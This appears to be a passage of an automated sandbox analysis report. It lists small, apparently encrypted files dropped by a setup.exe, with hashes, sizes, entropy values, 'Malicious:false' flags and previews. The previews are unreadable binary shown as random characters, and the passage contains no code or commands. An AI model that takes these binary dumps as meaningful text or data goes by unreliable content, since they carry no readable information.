              SSDEEP:48:atQGR6SF2vkbFCAv+2Smpi6T2CoLCF2ujRKHNCg2Ix2Fv3D:6oSF2vkQmvZrKHQg7xsr
              MD5:F42272C02AA69208B4947162729296DD
              SHA1:B5BA427136BBF1B71CA69B181E3F41F6E0A45097
              SHA-256:3933770720F33673976E3D9217DC0BE73FF00696561AC5437CB9E7ECF7B4D305
              SHA-512:507E6C69AEF5CCACACB360FC48163B114DCC45416AAF2F077AB4C1E15431ADED5020C9B1854F447FAAA4D876A470C58AFB2ECB116ABDB48487B9C67EADE29B2D
              Malicious:false
              Preview:<?xml.L.J.H}Z...n.e..#.....3'..>M`....B..X...+..u..`..n......z.d....G.o/.B..g.~+.~....w^l.!2&sx>{b........%.H.....d.....;*....3..HP..z..T......wq...r.R..i..DW.'....7!Oa.#...[d.P...n.c.Eo~......9.QK..;{r.;z.[..o.........5.S9Jy..........?.....Gl.'.7z..U....A.x..,.....9.v.R.{.a...z.t..MQkWQ.o. @E.......cA.47....g"x...ed......[TK..Ksj..R!#O ;)...#p.0rT..L.2...._Rf...H;..&..`d%.JZb.........7.5....^a..[...Q.....k... ....}S.,..l..&..*{a.=........u..s..}.&N...6...`.~[.a|.>..`F..[&.Na..,....%w...v.iH...._I..G....v..g..'..;~..B.9"..o`:......7.F..s..+\....V..\JeW...c..`....^/o`9|lK..T...O.P.Su....X...{....?.& ..}...v....E.)...F.GK'...y<(...e.h'A...k..rj4.~...d.r.*%wyEd2=.k.:t...}>.A....... ..M...........tdx....Q..5..u....."-.NR5...2....>h#..;)b.#...Y...D.........MD....+..4.*}a.!.6.'..D...../c.A......h..o.....J=.... .A,. ....7..p.j5.}.#..\..?..^/^......+..s.......}RifllU..~.A..{-.s.=^.*k<..h..c.BdP....O+{.`f.h...s...'.....Cl=.i.z\.M..:..e&..N.8,9.$
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1704
              Entropy (8bit):7.8961215744198405
              Encrypted:false
              SSDEEP:48:qDi/NvT5l/TPd4b6EmZl7S1QJRL/3fHnKeVeYEjD:WYN75dTyfGmmJVvHKeV/O
              MD5:D3D08B66F75D2C046E42656D80DD4ED2
              SHA1:B4388EEA49A45AFC08DFE12F471E4F5BBE3DA38A
              SHA-256:C25D103062D80C6E7044ED576F7197D7A64517B2EBE349EC4C1053B17F1E749F
              SHA-512:ABD892E90626FA061E6B7792CBD5AAEE6E85D3EF178B3D18AEEA79550C84E5B0C3ED48CD95D9FE64B74DDD4B6AF40AC13AA9A6C1EF8BE3303C5C75F31301A249
              Malicious:false
              Preview:<?xml..!......c. 7.Ew.q.eE...lT..|+.G....5...1.Pj.<^.g3e..*.Yz...O.Q..5.p.N../....mr=..k.....$k=|h.c..V.....}.b...x.6|.v.d...T.r.F..B!.m.$.d=....s.....E.x..@/.o .....c..T...w.r.++2..:..V"......*"..Clos[[C.].e.X.z/...K.m:0.....&..=u.z...-.UaL..M2../T...W^?g...V.Q..F.aN..D.`...W.....+.Ew........0............)...s.8#. .p..*D...:,.G.KU..Z................."...+...Ak...=.G.....S%-<..53....(.e........].4..c:.C.._.kn_.qF.....Q;..$.. .....6.--.{B#.}...bO..7=oT.U...w}~3.......D......]. .}O>;.(.N.z...^..4.n.vAE+.~...G..t..(H..R,..?.....#.b..&...q..nF.1)P.p.r.%O..-.3.=...au.../A.wa}.(....@8...cg.h.a....!.H../..F....F....y...Q...|Od......km..._(...........C...79.....8Z_3...F7.%~A...?O..X..1l.1.<..Z...H...7~....)v/v.....D.6p.....D`.....G.....{@...Y1..:q..M....V....X..=V..`,\n....W..^.^.3V.D........^U.P.W.. .$....z...._.}.9...]?.X/......G.....k8Qf.."....}/..7..D.J.\.....D9.. .0T......a..r#..#.......1...l..A..G.HY.;.....+..W.}.<...y.)l.6n.6..P....#.X
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1741
              Entropy (8bit):7.879852864774118
              Encrypted:false
              SSDEEP:24:scXyFlYdfHmfkJHkqgFx2uTaSBYgPvHgEmY8LGD4iFi5wndZxs/pbD:spydHmfmkLcubPHAEqLGP8ozxs/JD
              MD5:F653516B5DD1CCC20AD6F5E917C36E8F
              SHA1:C800B53E4AB46B30B76B091DC55724EC94B67DFD
              SHA-256:AA66885BD95A15B1FCDB79CAFD1868125FB88655106617B2F7703BDCF2D5FB07
              SHA-512:3CAFB2E2D792B8CA7987F0A0BFC22CC50AF424EAF936E9CC4BDE9C3C21268AF96E02F4F8065F4947B78ECEA1D5B055005A6BEEBACB67B4A721545C7EFA7D77F0
              Malicious:false
              Preview:<?xmlq..3DAx@..7I<....e).o..+...F.>0....O.......i*u....\n...q...Dr..)...a.X.QK..X..;...0rSAe....>'.^..w..uuV...A...[.'+?...t-]..\..Qj..y ...=.J....m6".B$..E.a...4.....63..8.R+J.....Z.T(..{F...T.F...O..8..eh.3}{...eg'.(...Ld..-....$".~...o.....h.....~@.o.3.Z(AAR.G.:h.Z!.6..-+.i.......Tg.$}]....b...O. ...........ZV.-wO,~.!f..5;Hs.7{E.L.k.`re...B...BG&."....Iw4Q.|.05.r.3.a.[..9...E.W.||.PzQ.Wp*.\.|o..`.DUs\..)..Ck>.cS.. ..`.Z.3....>y.#%..{.....*J...c..@....a.(.N...#..dMO.... ..`.)......5.ks....0b..$..P|<...ha.".....n.t...t?..P.0..j..%/..C.=[Y.q...x....m..%G^.5...[...[.,n.S.g._-.......g.jC.W... .X.5.].....Hq6.?N5y.8}.G.p*!.i."pI{V6].Y...b..wX@3..u.di..=....-..`..t.S.....c. *.f..X..X....B.?n........t.~Q....f...=#B..k-7NL......}..^....t]...-TJ.......<.;....2.....A..n.....qM_...|*...x;..W.E8;.%Z.$..l1."...8..f.<......n.gC..._8...Y=..G*.l.rF*...."....,..N....~z....7.\..`.q,.M.g..L.J...!....wxV.....@.,0+.z..[...W.$....'.)fc....L.%s.U.;M.T..B....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1703
              Entropy (8bit):7.901423226800134
              Encrypted:false
              SSDEEP:24:7KCc3XnWpQS2exCVmX0Yur7QFX3z98lje546vg6SLf0d079TCfnNHv4d8RJtaf38:7KCYX4QcEV7AiljmLNgCVHQeB+3gD
              MD5:168681A209051F73AF3DE4BC37F38CBB
              SHA1:CA29A0D494A5AB8688912B80B4B2A2DA4CE6265F
              SHA-256:F4A18944EBD07FE5091EA69F2488D692E419441179B300935ABE92E8A9E3A466
              SHA-512:6D3A7AA0D88D600E134AFFA4BD24F826948B4B4507A5D021E0A945F368F18BD365C58C9653D684C48A8B9660D4198CEBF9DF93FEA4D9713BBA83D118EA25EE0B
              Malicious:false
              Preview:<?xml..,....,r....f...S..Ug..r...<........5.).N.f.M..a.<......p9..C.%.?jx......-..e......B..q5`......+...z.*..gS.....p=8....`[..t...&{..M.c...=..A....R'*.D.....x..U....U`.p.....G.h.#sH.:4cFLRN/f)c.....?......V.m.._...ww....OE-MTa..&.....#...HI..Qi...p.......8.V..8........R.y.y<..P5...b.....`...y..?[....7D.R...d..;Y.....7wf....z....3..7.I.$..Z.Gx....._..1...A..s..SN.D.X...1\`.n^:s......t.f.~..m.Lh..6.0.^.D..+.Ct.b.X.WV@b..5c..J..........h..._C...A|....r"....o..`Z.<nlC.......).P+..R.. T..kmVmP.dvob.?+Y.].^.h..|......tq..W....?..u...~....I..c.....0).....%..?....O.6.#"..6.c;.Qg..w(.h..z.M......,x..'.)Dwy^f..l.V....5}y....Y........iO[.Xx.4.|..i.EV'9........m.ur.$-..}....m|.#...s(..6..8..e..z.t].zJ...T....:|.......}.'5....].:...Mds{..-..q.7&.KA+C..&....\........=".. .E..j.....r'B...u.jL....g...i.fd4..G../...<.ki\I.ER..\XR.....y......,z.....6b.Y..q....1..K.<... ...@..B........lGj...#s....9...V\.....vq~.2.......|.X.J..Fz......%.._...C.."....v@N..Zi;.D.....D!..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1740
              Entropy (8bit):7.891799986892663
              Encrypted:false
              SSDEEP:48:JP/qZJy9vw7mfpW4QyMDjMtxpRUD1BJ1EKTFPZTL7MCD:JP/i6vumhcnDC6vFPZT0K
              MD5:16CDAF6AA502B5B3DA6C4C2F6FB1325D
              SHA1:46D2BFA837EAAF50F1BD7118AE4A39A0015465B2
              SHA-256:00BA5942C3F06A1D44F1EBC8F02D7F5897E9BD415F550F6BE8AEFC0CFC828B32
              SHA-512:01406B4483024DBE0AEF00E97D720CBA8468B76C2A414D2A5C15DFE465987BF512C82963708E0CAB19AE6DDEA01B0887A3CD42EA503A03AD343DABD60FD12EDB
              Malicious:false
              Preview:<?xml.....\m..7..}B....!4..gh....t..Ga ..u.l.DX~H...)..f...^?....uH..+>.]T..j.N...o.....!.Y.!....F.#y..R...Db.....q.l.b.5x.M...@..k....H...;.......eZ.E...N....._.o)..!n.#.k..e.kMU.7..}....S...B.&...?...d..K=....8...6n.].....D.l.Q!M...."+..!.......X.........j..9..w.i.<...tP.?.'......J.....x........jY-...).....\...n...!J&.H.<...D.. 0.[._B.z........."..Km.4)Lx|._..yx..........P....(..b...;/.{f...0.#...3.Z].0<..&z..'y..~.u.8.T9vl..E.....}.o..L.5.eK.}ua.....s.&....@.^.......>Z>.@h......T...}..b3S.S.v..&;a.A.X4.hN.....P.7......'s,...f0..].4.8....#.t...`........0H*.|4#L.....X`...N.4<.<..a.a..u.l..)#..C.JJT..W...:...q.h.:X.....Xpv."..y0zD:.Fm:..n%./wwC...tg.bP.>..R....q... .......+.}.['.X........j...t..K.szM%p.q......s)G...*.(.x....,..u..(#}...k..)..Y[...t..@'..%.4..p{nQ....c5j..1...w..+8...3.m.BzTi.c..#r...m.0.0..|....P.vh....V.,..L...Z.s...o.U.zr?.As2&.'..*....<....@.6..H....?.2.F....W.=..JB}...k..6..7.....S...;)\e..R...y......r!.s:..0.R.........W
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1713
              Entropy (8bit):7.886771748660766
              Encrypted:false
              SSDEEP:48:g/eUYOAN2AN5HLhfIfXD70+75IBrdBIP7D:gVHAgtZ7qiP3
              MD5:397230BE399B83023498F4C0A3D5ACD4
              SHA1:0BF4B83F0C0F35DD0CE6E5850C3AEB52BC3D66A3
              SHA-256:FDFF64F26563BBDA9C3F913BF5BF64AEBCE3D4615EA5680CB0E2DA9F804C5213
              SHA-512:93F9E25BF641569C895142908D61552FDBCA12A67F73170F8062DFCD23275CCE359D94123140F80598E90F688467E3187ADE861350C88FA1B3A56BF3969AB33E
              Malicious:false
              Preview:<?xml@.g3.`.i.45...V..!3.{(...#=0X......h<<fY......*..6.T......_.!.E..i...0..|d...l.\..3fX>.-?t.`C.......y.5....p""..GP.P..F...A.?.0o.....s...u......R-g..8.n...3...I...%.....:..1vh.Rz....~.....)..ub.S.".G..._...>..Z.K>@..~D.o.G....6.j^.m.u..Wo...IU.*.9......d./..R3.G|9'....H..,.r..-l....&.....kS5..iM..Z.k.........ELX1...I...!..!.1..6z.t..A2..5._._..t.p.Z.+..g-xl..##.B...G.j.8....2..J.$X?..\%...q..Iv...X..r.F....?r~5...{&..6|........b.>.y.........K4.:..'W.~.8..........w......Nd..B..<....5.l.zi^....w....o~)^.....5....R.@.v..|g..?>..%...</.3..x.BU..0C.B!J[V.;..D.q(.6~._@.z.c.k$.,....\.jYQ.....%...+.....e....{E&....;..%......:......P..0..5..D;..b.Zp..B..-.:!V..dE.....mmc..[...@S...i.....o...{5..,m8sB.....J(......1.1..>.......o..G...Qo.3.s.d..^.*....qKjG..O....B..K.......m.K.e..#.p;Q.K_$.T..o..}....l0|....Hw.C3U...^.|..#..<+.<.#..w..PN.Q>!..U.c.|.T...|..;.e..u6+70..VR)'..,S..l..RsQp.~.R...(.b..r...k....[.M...r..+......S.V.v9>p......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1750
              Entropy (8bit):7.884136970344184
              Encrypted:false
              SSDEEP:48:RwnWyOFLykWEcJJodgBTyYcT04LCuLEoJD:pLWB2Yi0F8
              MD5:A113D05BD8BFDF383889EBCD9EEFB3E1
              SHA1:CAA7B47A2C83FD57F0E197D1C43F3F0A632FA972
              SHA-256:1EF3BD6459F2D45CFF8287C65FA0C0EB78DD1D2A66674000F390D722B07250CC
              SHA-512:9FD39F01E8CDA974B603EC11FF968B49F1154289BC45443650CAB2EF92164F997EDA58EAE2FB0205A4E2A0686AA85120B72CD1A81FBEF1273E051E7295FD7D95
              Malicious:false
              Preview:<?xmlY>.l.,b.Q..v.....+...t..:f0h.....fhK8...{z1.5.J....g.'....'..z&1..'...)...I).{SAIo5.0F9.d.:ht...l.g..Y..-*sJ.g/[..D-y>.o......z.../.C..p..4\.z.}t..bX<'.E.Z...1...2a.........1..l...>.c\.g..I...f-.1....i...b..h..B.].}`...(#..z....:.Z.....Pc9.a~....wT...b:....?p5.....S..N.2.q.a5.{..<..<...R.M...&....r..z<....h>.N{i....B.........HRh.U6..OS.b.|.0..=......jq...:o.......b9.5.z#.....j...$.Ce{..Ky=Y..`...a...c*4..'.T.....7I...?.(sr.sO.R........8.....W>.k.9K0~..-q.%/j.5FD.xl.@.a.~....Nh..f..`....!.\.j.ZVs..Q}.XNd..w.n...w.8...mn.;.t.c.c....0.Y...B....t..J.7.'.%.C.+...Kv.w.AZ...x..O4..).c..V#.aQX.R.......)..R<..Z......U..E...rE.......z.E...P...Y...#...f.....q..j.R..\-......`X..........>....'r.h..X.....h...:...m..o...W-2j...|s,....t.!.B\....G.......9..Kb.{...h...x.'....a...G..z......FA..trJ.:.]Z..T^5i.%.a.....*..a.@......y...2.17.4^...1.;....ZeW...V.V.^...D..m.VT.9..2...C..r3..D.70.+.B<......!. .=.}U.......{...a..8.G......4.>.d&K...ji.@P..z....f..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.87953843037655
              Encrypted:false
              SSDEEP:24:a084Ffy3169YF5saaekW22HbXOZq4NXky49z2EBNLdWSYY6gfiDqPUjbD:a084FyFZFrapSXOZJhkymz22W1qs3D
              MD5:CDBBFBE018447E6695F1169BFA04C56D
              SHA1:48F9F409E93CFEB17349AAF3ABBC67646EF95B12
              SHA-256:880532BA71497FCFEB4C6CA32563AB2CEF3AA9CA8A1469E3FFC524B5E2F53018
              SHA-512:456BADA2EBB605D39E768456C257688BF188079BE72D2FAEC093B7B050AD264CC2239D1FCAEC7D79C85B68FC7E67C604F28D9E50EFE68A7633BBDC489C812EF7
              Malicious:false
              Preview:<?xmlC.....?.k..U..\...<M..q.h...N.K-vw.l.R.x.....R......0.f..s.A6.o....OT..z...JD.f.. ..h.P.^.'.L=D.7..!{E.'.Q...?..s.....].I.*n.6../v.T.8v\.qX.C..MR..fm......#M..U.3..>o..(.....0.Z0.......m.t.0A.,.3.*x=;}U...W..../)..*...Z.nC......t....L......%kO.=.Y.....'l.K............4.r....m..q.7]...Op!....d.G5Uk....16&r.....p.6P...k....Z....LpU.i.\...UEi......A.z.~V....ZpQi.D.0.(.T.T:...-|X....?...1..uU..#M..D[t/..E.....9.G6M.>.%. .....X.e F.....X}.Q{.5&.a..iY.#..j.....X..t..&...a..$..._6b.(.]cG<..|.y..C.vR..X..,.7......G1.6.;.3...w|dI.....x.2..]p...v..*.[........H....i..:w..VP.S....K`+X...?U..-l$...V_B.2...aL......T.D..x.....x.~....r.\.:.n.5Q,..!.(7.Y......p/....O#.Y...........LC...L"....4{-.jv..=.:..>U4';c..5.?#...$....>..kU.X..&........l*>p.q....Q#.....VK..\.R....*.....6(.+8..AXk?...tE}F...$bd.t,p...|.j....2........>....+.l..).....;..~@L....NhtC.'..[.rN..Xc.o}!k..i..Y..|O0./......'...}Q....1.v......:......Jp.Q<$QGLk.^..x....F....8.._PKY.8....}X
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.890834373490403
              Encrypted:false
              SSDEEP:48:Vua9+/qkpKYQuQ14jAUUCW2ZtbtIZ8Zw4EzCFc8DsJkZfXbwEcWD:Vf9+/cuQstWetII4zGeufMO
              MD5:FE3040B656C481BF955949AC571FAE09
              SHA1:04B68D6808AA25865E1529D3237233D87EDEA548
              SHA-256:2383468CA514CFF26AF8C1A43645DBE4E7E7E082AB837D03061AAE8E5633B0CC
              SHA-512:30503361BB44FE229A37A971F391291AE6DD0C28D9A02A610156AA6D4965A8424427205A6FEABD9938039406249F0A4838E5105558256E93CC7EFF57254FEFF2
              Malicious:false
              Preview:<?xml.......$.......A-f5.).3z..L..3N.9.VOM1....x.^...........p9....s.8.."A..?..... ..J_.%..uv.g....Yq1....\.V..-.}.(?..C....ch...,R...A.T!!.E2..-....5>r..]........I..m...X....jV...q...Q.A....b-...X....brf....8q2#7..o.ao~...#..adh..#ys...2>..4"".. N...5.0<o.r...E('....6D04$.A..&p~ ...........%.]....g.A=;.._Iu.&...I.&...M....X5.As.p...j.)....T.&./../Q..i.....fA.....<-b...3.#.8.2G.J.....T&.7+..n.p.2U....t.K~4.....{.>...{.d...$!.m9.v.....Y1 .......u....p.ER...'.K..S.o...zc{U.t.|p.TL...[.\T..k.>TU.@O.BOI..;./|..Y#.d.5..|.S7.!.C.......L.*...(......:.\t.@..!1F.....?g....'.g8.9.3M.Y....|[$'.j......F._GO.k.l.._.v...2...\.miM.. ...;.6H.-U..@./..>5.nE32.)\.'b4.....P')/..L4..5CR......z.....r.r.3.h.Rk.S..'.6d....2.M..vN.{.....6.0..l...w.0.!g.q:..n.v-@GV......2..-.\[.X.Q..k.J...`.....jQx]hl.y_W.R\.4(.....Z`....!x.......#.$X?.:.Y.....\2..QA.X.8........p0...g9_.....QD.X.px..............w...n6.eq.S.a.0...T.,....Qi.U....Y..E...h.x...Uy......1..u..x..l....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1697
              Entropy (8bit):7.878983715821069
              Encrypted:false
              SSDEEP:48:gnksbjko4O0WMyMLxwJePOJy8L5Doqi18D:+YnQFoxwJoOoCtbM4
              MD5:57F6908624CF69862E56BE42ECD40883
              SHA1:1A29700CD1693D3AF6896E8B84B8A6EE24BC9772
              SHA-256:F8504E1CE93077506149F9CFFE799D3EBB684D40BB72786E205252072E74A79F
              SHA-512:68ABE2DBE69B792719739627F4546B3BEB9030517806ECE527042211B07920AF33B908BD867506C94473B20111949E1A9A0504E973EAE458CBEBCBF9E56DC79F
              Malicious:false
              Preview:<?xml.k^&....;.`..|..#.1#4+....X.;...o..Ps...;...........2X".2~.......z.u...P...XY/..._.<.38.e..c...C.#.H..Z...Z.....I....{....../....q.?.G7.....S...h...".Y....Q<..D.'.......K..*..aj,..bqT........l...S5...6 0.q....{.......@...6....... ..-..f.Z...d.!.0.i!/...t....On{..J.n9H..'.E.pl1S.t......H..,F.qM....$+<.1.F...d0|......D.@*V../%....:.P.6.Q..A....@.v...&..{..h......s9a:H.#Y..?.....A..;.....4...4.L.Y..O.P.....bQ.,}.&MSP....L../..../.R....S.b\..&....W.A..SE...|...DU...n.:Z).!|..A.........0..........l...&.3S...2...d.+=.....x..~,@.I..T.!....~.M$#.[.w..DM.E..!'x.C..|....5....I...~..........u.UB..'....)-*2...}.?.....yT.3.v."8-.&.&....>a.....<.(.E.5d....e9AU....y...T.;}.P.a..X.='.}N...8.c.O.jDZ.......2....9..F/t.al..MT...S...]H.. 9QBe3.P.N:...8a...^|.E..Z.:.M.X...0.......}.`..5........I.(.!./.N..-.e.....&Z4.)..#.....a%..-A[AX..B.yz......r.D..B...T....(...].W.6.*.GjB...2.md.0..'.O......V.|..-..c[..B.zp...?...e.....N....h..^W~.^.F@.......1G3..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.891367371188002
              Encrypted:false
              SSDEEP:48:XDeipgqk/9Yto8EOOvESF/yMoKYBqTaluJ/UygsD:zffkFXwuyCYBqA2Dx
              MD5:DB0098A0F98E3F9643B9BDBD2A43ED32
              SHA1:4ACD4C6B2AB2B9F34E6B8FD42EEC895232B24A46
              SHA-256:1CCCE99AF22A0EEDC672F6985142A5C760B62F43EC3A9AAB0DDD82BD556B7C97
              SHA-512:BD0E63D8CDFCB5F00FB83C46D975BFF5D01EC9C7E0B71651DCE6553656BCCCD1A00EBCE6B4B262BD87988840099A84FEFF5E1A819183246B02FA2EB1C6E36D6A
              Malicious:false
              Preview:<?xml...O........3...I.}..O.]gL.1.....%P.......F@.......b...9........V..Q6...|eJMI.I.1.<...Ae."......).t.ej.tE.:&l....e&.1.......B....fC.n.$vw|..6+C..-.~.v.....V....Z..K.....L..M..C.CR.Z.......?!|.3ee.a....h..q.X....K....=... ........Y.|......3..I.d`..".R.Ea.9..\...'y.I..A........E..x.P.B.......A.1A(.P.O(>....I 2<..J..9......m......)x.....T..K.5..'....L..X.b....70....4....J.zG-.}..S.I.n......3...*...(...#.Hp....4f.W...c\~.K...."6...Dze2~<......L.0.88...q.:.....,.....-.6..>..P....)O....YR.Qs.U..........-.....6..hlOPO.(+.;...H.b;........vc.H...QF,7.u...5....j.S....p.0bn;...;.v.Kv.&.>.w.W...3............~/...`\..?j.z.SP.m.Z.>pz...PQG.J.0o.e..4.g_4...@...O..........n...KG....\.Z9D.._..R.L[N@.d.avPp.P\.......Z|..4^(&..O.1t.#R...[.3..|.\.d....L....=h.YUOg....:K..B.d..n............|.........jKHD.$..6.....^C4....;.zX..8..7.rM..K.*.q.N@J.U.~v..,D.........\Pzo6Q.w[/...n.+.......}Of...L..[..Qy\...f...0...z.e.j,....OrC.Y)~.L...$.A....<...D20.o..t.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1704
              Entropy (8bit):7.877210361392431
              Encrypted:false
              SSDEEP:48:wEihYQAPjbUnZBu+VBrVj1gvOjM2xg95oD:PihYQ2zGBWKRxm0
              MD5:24FF00FB6D42379C54143EA9E4BC01A1
              SHA1:911628E15D13A54DDF603EB9EB3BFC051F507988
              SHA-256:27EAFB4870AEFB2E1352A1F1F7809A1B08FDB67944386A947D0FC9DE53A9B882
              SHA-512:AE2152FC36CB2036042520A104C480D82D3571978916264C9B59302FBE79447E3228916B7862D3E47A15B99DF57D5A52CECA1CB7E0E5FBABA58BCC2CD99AD0DD
              Malicious:false
              Preview:<?xmln. O..>O.V....$...=mM..`W.5..L..y..+...}....j/...........g.j.8._.<.Z.\.]X...ie.B..s..-..W.V9#o.............+.DP|m@N....IM....'~W4\.fwd'..G...(.....*<....p.........A+S1P.?.n@...S4.\.....aX8.C^1....4..pB.Z..`Z.0#...O..V.)X...]..;b"....%..v....+..`T....;I..ab...<..~D....`.,:...s....I.8..,...H.(cF.e.B7..yZ.KMz..;;A..^....i..T.Qe..RE...a|v.~...*'4..&.......M.......ck...=/[..fn.........n.$..=...D.x.<.O.y...7..2j..X...2.`....* PbCi.g..=....<...!.AB.6W....}...9..XaR....oR.h....V......>s.F.2J..X|.%>...~.s........._0D.|<.......Z..MQ)...8p..a..1b.XcK&..|..1._.5;>.&.3.Y...jy_...L.M.....g..d.bk.....R.K.P.A.-......!......Fn.F..M...<~..g.F.T....z..8S..w.-.d...8+JL...2.......T.)........L..\.R.#..._..$O..bC)..W.....1..NZ..s.M..t.p.o.j..R.m.....-...H....&HDj...............b...Dh#.8.G.|..0.c.#&.#...DCA.t-.5i....F~|.q4.'............9.#gW.}x&..S.w'......+.....,@n...k..2.\.L.#^S.....O....i1'.;.08..p.)w......kg..7..9.,Y...A..PCJT...2_.S.+..Y..+......Jwg.......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1741
              Entropy (8bit):7.88052949907814
              Encrypted:false
              SSDEEP:48:SJIi0Yn7iGRwe6PRggCLPn+JD4b3ZW0z0q1KEm17KWx0co/1D:CIiNn7ihQGJ03ZZ0q7oKzcoF
              MD5:42D3E966D705ADEAE0060442513255CB
              SHA1:5283841E01296E3D09D817C8CAE00B53F0651708
              SHA-256:2BCF5AF27B88F9A81D7D225DB976DDB474D3A16C0BF6F096C00185F319BDC583
              SHA-512:5035B6BDE950053D36DD7A3153277231C19FA4E659337CBA0452EA4294DFE98A9EF5A62AE82AC2A275A427A33B92886D2F2801E8E9CCD51E5AFAC87D812D55A2
              Malicious:false
              Preview:<?xml...@....%...0..zb......2.k...!l.^P.P.h.i..k..W..,.K.N.X.]p.....F.88.[.R0.g~..8._>T.. .f1....!.Q..N.....[~r.P....#R!%*....-g........{f7t...CE.D..O.....d.!Ci.C.7....@Q.z..............)>k...\'.R8.T..2S.._\.o.qd......)..B..mi.....-.Z...b5.dX.`. ./ ../....#e..[+.p.S..z.mwd4b1<7..B.L/@[u....>.Gl!M.b~.XS.^.. .R.-..D.Y.h.a..........Nt...{J......C.21u[...F....X$...} Q/.....4..G{#...98>W/.>......g.l....D..=.....u9d.._Dn. l..RCXT...E...B%,t .(.v../.>.T.....W...X%!.S.s..df..K1bGO.P..s.5y.O....j..Z|.......x.%..........:..!t.#p.-M.]h.....eo..'........@3.'.....8?......cD...5}.5....3.\.H=?..y9N..-tA...Z|..Q.w(......~..l->...a.X%.kM)..Rc....U..^..H.8..?.f.n;D..C..nu....B+P.[p.;b.1.....,..H......s......oS..".Z....m.2........Z...........pY...T.[..w~.zW....\..]$G..... .....d&...Ub.0.V.~(.X.....huK.........=+.......v.\k:%..........\P.8..,.n...i.!.pO8{[].a.2........k.J_.\J..VU.....S.}FqT.....-.d...\Z........g>3.&.....c......:/..$4@.`.L..4...O...@.AUbW...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.867870414881722
              Encrypted:false
              SSDEEP:48:GT+wCWyhP4PFrUWDmeNpUUe6s30rF11qGYoyreYD:yVzyhAyEfNpUUVs30T1qfKE
              MD5:981F1CCDBE904A8F076D77DD61065F4B
              SHA1:2B3C100DAF2E74E03885800F9A3B1F858EDC695D
              SHA-256:DE34C8A35893E25945C784BCC5D0A424ECE08B1D8870A9D1F73B1789DD81B28E
              SHA-512:2DCFE7194A812050B0E0F24CBF092127212CDA1EA0856330C229A3C5B4055533E28BB00B3BB7669F303A4792437E5C75C946110D571E8A22F64769416D6589A1
              Malicious:false
              Preview:<?xml..me.s...W."?....&.f..p...S8..W...8\.I.$.Q..>$..B......dJ.....9".......;Wc..S'.`..a...?...t....3.\....c~F.^@..z.Z7.W...L...!10<.O..ZkO..>...y..Ex..Y.,.;..W..%P*......y......c...i....q..>.$.....G.e.C.P...P.z...N.}kQn...{2.......O.....z_M<.......{....u..Q.8<i...74........(.H4...!...Y4..Y..3...1.....y.E[N.*.).d.W.e...|..].^....<.....0@..CU.^.....:ZT.,w..$.rU......(#pTCo...j.....bp%._2...1.#..xVvP....UZ....).l.U..:<V......2..v...J..".])....?{eD...k.....,E.. ZQ.J.....P..._.!.....db.K....B.....8.!HN...j'.P.....[.Y&..e.a.\.W..A.9.....*.%..<V.3....> .:`C......'Y.=.....b...?.G[8i .R.5v..S...O....?..J....D......BM.;?N..}!....w},..B.v..YD.'k.)...f..OW)..6%..vR~.t.{.}.%....%?.8....o..b.)....[.. S.....#u..Wu...2..#.+...Hl<.j<.v.._..S.PO..u&).....9..#..r.j....+...w...Mp!.l..X..\>{.uN... .2c*"f..-E~H..m....Z..+...1{?....?."....G{$qa...*...g..{..C.Y6..>.2:.:......K.......<...*.3.._(.#fk.?..|..G.p..Ql..V..K,..+.k.e.,...o.8PwuA.l0..$....<.8E..Xc.....g
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.90592773790549
              Encrypted:false
              SSDEEP:24:4QI2F2AtFo3pkX+j6V7UewPcwja79HwYxdosl50BGjd1hjZYzaANseMjRJwvAPr5:8AAU+j6KUwYwYzrWGjjZY4Jwd26ED
              MD5:1075FA948645E81C23ED4720B88CF42B
              SHA1:41F70B87EBD3FD08D6F0E8B4C8F2464B15DC55C0
              SHA-256:3636A34C2CC57961A66209A5CEC5F7B8997F66F78F2F8F5E298AC88169CC1E7F
              SHA-512:FB3A7C309E71EFFE185B6C6C06325E97DDC404A474FAACB0017999A2242F490430D2DAA6FACA9AEA7E45FA0694A8652A8B30DEBE11D73818E1FA1935F5A7E862
              Malicious:false
              Preview:<?xml...J...).b.......AJ.....k..l.7K..H..Dq..j...9.N*....i2.....?....[.._.JH3....9.j....:.$m.s.].7g^.l.E^"!....P/..S..)....V7.AP..+..2..z.#Rt."..1.gGJ..<..K....9.^&q1.~."%..:..6...5M"}...M.....i9..F.{`..9.;m.|*..@..5../5./I...pe..l{.2..;.K....^....D....F.[m.........YS..PX...%|ewRt.Q.H....c%..[... /..7.NaC...c..P.w.b,....$X#.....k.E...........OD..G.D.&c..B..oW.x.6.t. ...I.dK..(+....{.'=...M.......b%..;p..O....=p..,Z..G]......Z.,.....$.f...b...$....PX[..Am.F..I....l!..*).....<.......q...!.....#..J..{REhww.i.......|.v.n.Zf....e/}.N...^...9'*O;......E.S....D..y<..t=+.TFH......U......o..S...g.]...Sh/X@}.._}5.j.M.H...Dy......{....2y^i,vH.NK.."..KK.}`9...~b.tw;..r........K..R.|...u..........1.....S...,?.&d...pc.../..g.2._..v.!.l.^&..Y..R|.6..3......\.....nM.....!..r.Z0uzP..X1%..~......e........5.71..(I.Yc'u....).m:.)}Gu..*.8z....D...*d-&..|...P..$.0...\8.7..WYb 